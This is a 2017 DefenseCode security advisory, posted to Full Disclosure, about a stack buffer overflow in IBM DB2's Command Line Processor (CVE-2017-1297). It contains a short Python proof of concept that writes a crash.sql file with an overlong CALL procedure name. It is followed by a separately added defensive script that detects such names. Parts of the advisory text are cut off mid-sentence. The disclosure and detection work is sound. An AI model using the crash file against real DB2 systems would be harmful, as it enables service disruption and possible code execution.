[FD] DefenseCode Security Advisory: IBM DB2 Command Line Processor Buffer Overflow
- From: DefenseCode <defensecode AT defensecode.com>
- Subject: [FD] DefenseCode Security Advisory: IBM DB2 Command Line Processor Buffer Overflow
- Date: Mon, 26 Jun 2017 13:21:29 +0200
- Sender: "Fulldisclosure" <fulldisclosure-bounces AT seclists.org>
- To: bugtraq AT securityfocus.com, fulldisclosure AT seclists.org
DefenseCode Security Advisory
IBM DB2 Command Line Processor Buffer Overflow
Advisory ID: DC-2017-04-002
Advisory Title: IBM DB2 Command Line Processor Buffer Overflow
Software: IBM DB2
Version: V9.7, V10.1, V10.5 and V11.1 on all platforms
Vendor Status: Vendor Contacted / Fixed (CVE-2017-1297)
Release Date: 26.06.2017
1. General Overview
IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) Command
Line Processor (CLP) is vulnerable to a stack-based buffer overflow, caused
by improper bounds checking, which could allow an attacker to execute
arbitrary code. The vulnerability is triggered by providing an overly
long procedure name inside a CALL statement.
2. Software Overview
DB2 is a database product from IBM. It is a Relational Database Management
System. DB2 is designed to store, analyze and retrieve the data efficiently.
DB2 currently supports Linux, UNIX and Windows platforms.
db2bp is a persistent background process for the DB2 Command Line
and it is the process which actually connects to the database.
3. Brief Vulnerability Description
By providing a specially crafted command file to the db2 CLP utility, it is
possible to cause a buffer overflow and possibly hijack the execution flow
of the program. Crafted file contains a CALL statement with an overly long
3.1 Proof of Concept
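The following Python script will generate a proof of concept .sql crash
file that can be used to verify the vulnerability:
# Overly long procedure name for the CALL statement
load_overflow = 'A' * 1000
statement = "CALL " + load_overflow + ";"
# Write the statement to the command file passed to the CLP
with open("crash.sql", "w") as crash_file:
    crash_file.write(statement)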
PoC usage: db2 -f crash.sql
Vulnerability discovered by Leon Juranic, further analysis by Bosko
5. About DefenseCode
DefenseCode L.L.C. delivers products and services designed to analyze
web, desktop and mobile applications for security vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security Testing,
Testing) solution for performing extensive security audits of
code. ThunderScan performs fast and accurate analyses of large and complex
source code projects delivering precise results and low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security Testing,
Testing) solution for comprehensive security audits of active web
WebScanner will test a website's security by carrying out a large number of
attacks using the most advanced techniques, just as a real attacker would.
Subscribe for free software trial on our website http://www.defensecode.com/
Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/
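
Added example (not part of the DefenseCode advisory and not IBM code): a pre-flight check for section 3's condition that scans a CLP command file for CALL statements with an overly long procedure name before the file is handed to db2 -f. The 128-byte threshold, the function name find_long_calls and the sample input are assumptions made for this example.

```python
import re
import sys

# Assumption: upper bound for a legitimate routine-name part, in bytes.
# Tune to local policy; it is not taken from the advisory.
MAX_NAME_LEN = 128

# CALL followed by an optionally schema-qualified routine name. The name
# ends at whitespace, "(" or ";". \s+ also spans line breaks.
CALL_RE = re.compile(r'\bCALL\s+([^\s(;]+)', re.IGNORECASE)


def find_long_calls(sql_text, max_len=MAX_NAME_LEN):
    """Return [(line_number, longest_part_bytes)] for every CALL whose
    schema or routine name part is longer than max_len bytes.

    Comments and string literals are deliberately not stripped: flagging a
    commented-out CALL is a harmless false positive, while a stripping bug
    would be a bypass.
    """
    findings = []
    for m in CALL_RE.finditer(sql_text):
        parts = [p.strip('"') for p in m.group(1).split(".")]
        longest = max(len(p.encode("utf-8")) for p in parts)
        if longest > max_len:
            line_no = sql_text.count("\n", 0, m.start()) + 1
            findings.append((line_no, longest))
    return findings


# Constructed sample input: one ordinary CALL, one with the 1000-character
# name from the advisory's PoC, and one multi-line, schema-qualified variant.
SAMPLE = (
    "CONNECT TO sample;\n"
    "CALL SYSPROC.ADMIN_CMD('RUNSTATS ON TABLE db2inst1.orders');\n"
    "CALL " + "A" * 1000 + ";\n"
    "call\n  myschema." + "B" * 300 + "(1, 2);\n"
)

if __name__ == "__main__":
    # Usage: python check_clp_file.py file.sql [...]; exits 1 on any finding.
    bad = False
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for line_no, size in find_long_calls(fh.read()):
                print(f"{path}:{line_no}: CALL name part is {size} bytes")
                bad = True
    sys.exit(1 if bad else 0)
```

A check like this belongs in front of automation that runs untrusted or generated command files through the CLP; it complements the vendor fix listed under Vendor Status and does not replace it.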